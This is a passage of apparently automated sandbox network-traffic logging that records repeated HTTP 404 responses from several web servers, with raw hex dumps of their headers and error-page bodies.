cfL4;desc="?proto=TCP&rtt=1193&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71tq76pSm7fhLOuJQKugvElN4Ec8eBJ61odqyhMLGYNOVyESbudCSoDHZIiZpHAgtLLdnsLRVZKmhsRYrgnjXh51lsgPDsRcQwJLLq83xY5HYyEdANhgfOGd163pMRcX1QG2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a07e0c8228b7-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1541&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aN3AfrySMi9SfigESUPHRUVZOJx2VSz%2Fl0GBPzjUUsy99bCY2ixt2c%2FQVwmp3H7guM9q0l4JjUoTb9O%2BkUV9eH3yr7UuWPrV4Tnn8ry7C8XMeaTdsMjaOIz9NOWLK1xD5DRB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a08e0b9e6b95-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlCNNqx2CWr1fxc7%2FKGdybx6J0D6vw0vneNqOj2ylQa1wLYWDXS3EqYXHQiXVelTgqsexfrXtijVpq8qd2W9ggzaHyWdcUubamDDrYg29VVNk%2BXjSIXEA5RwK8G8LodI6mTV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a0a00eaccb75-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:28 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:30 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:33 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:35 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:57:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:57:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:58:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:58:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 